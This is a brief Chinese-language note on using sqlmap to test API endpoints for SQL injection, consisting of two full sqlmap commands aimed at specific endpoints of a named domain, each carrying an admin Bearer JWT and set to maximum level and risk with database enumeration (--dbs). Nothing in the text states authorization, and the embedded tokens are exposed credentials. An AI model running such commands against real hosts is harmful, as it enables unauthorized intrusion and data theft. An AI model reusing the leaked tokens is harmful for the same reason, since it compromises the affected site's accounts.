sqlmap工具查询接口是否存在sql注入

 

转：https://blog.csdn.net/m0_63641882/article/details/134529081

 

sqlmap -u 'https://orgvue3.cyberwing.cn/api/org/tree/unitTree?id=0&_t=1725517383534' --header 'Authorization: Bearer eyJraWQiOiI2MGMyY2RiNC03N2NlLTQzYzMtOTdiNS0xNmE1YjVlMDhlYzAiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhZG1pbnVzZXJkZXB0aWQiLCJhdWQiOiJvYXV0aDJzZXJ2ZXIiLCJuYmYiOjE3MjU1MTU0ODMsInVzZXJfbmFtZSI6ImFkbWluIiwiaXNzIjoiaHR0cDpcL1wvYXV0aC1zZXJ2ZXI6ODA4NiIsImV4cCI6MTcyNTUxOTA4MywiaWF0IjoxNzI1NTE1NDgzLCJ1c2VyZGVwdElkIjoiYWRtaW51c2VyZGVwdGlkIn0.P-RMGp7R8uBpio0iRSmgsc4kN0lwyHjZ7z5hcxBwBA6aH0soJkaFGb09TsJ3SeUKCJF2UhPxSeEXF1y2Dn2x0S5nQ4hlJ6Nw85KHu5gzdAf03tCyLrLo6WqEgzhZWToBFe1nlhWg-7BsxWI75fVoWEOh1g1ySVRtk1urT6ifUNs3zyIilMpX8oncTnM3fvG4R7QGnLGz8Hao15cTHg6eZAtS-8c8NwK3GO6EH2Law9Mv8f9vtPwJVR_sscAz891DDLng7JOZpexmU9Dqgtan-JrM51d7QaMrruF-Tk65wFqJogBaXEtsWDNviQB04dfhhILsnizgJ4XhNRquNh9wtg' --random-agent --level=5 --risk=3 --batch --dbs

 

 

sqlmap -u 'https://orgvue3.cyberwing.cn/api/org/QueryUserService/pageUserList?unitId=10000&id=10000&subOrgId=10000' --header 'Authorization: Bearer eyJraWQiOiI2MGMyY2RiNC03N2NlLTQzYzMtOTdiNS0xNmE1YjVlMDhlYzAiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhZG1pbnVzZXJkZXB0aWQiLCJhdWQiOiJvYXV0aDJzZXJ2ZXIiLCJuYmYiOjE3MjU1MTc3ODksInVzZXJfbmFtZSI6ImFkbWluIiwiaXNzIjoiaHR0cDpcL1wvYXV0aC1zZXJ2ZXI6ODA4NiIsImV4cCI6MTcyNTUyMTM4OSwibG9jYWxlIjoiemgtY24iLCJpYXQiOjE3MjU1MTc3ODksInVzZXJkZXB0SWQiOiJhZG1pbnVzZXJkZXB0aWQifQ.CI6lTpT-b3J8LbR0iPaFiy5fI51eqcduVxdtePNM9Pka8G1o_G4jycr6D87nCw2bP8K1a6PK6FTCi1-WOc4elJPaYvFqn3o8VNaJ7GQUjc0A80tq1Xclk0xSstkjeRr0mieWeu3m-J5l6jewfoDOjUPTOP2bjtd-jAK2KEpne95IImqGorVyeag3nSqrionRAxa38Dswcwd6e5tXo2y2Iz0V87ixYF72XSl-XAoxyRw0E-qMYh8aGsX6U8lt-1P7_1poUgaON7Xb0Va1zqDQCahoYSfKVMfUa-dbmICn-Zbm2TAFE2XNSjRWPouz06khPaMlkeEfkL1bAeBYQ5aEMA' --random-agent -level=5 --risk=3 --batch --dbs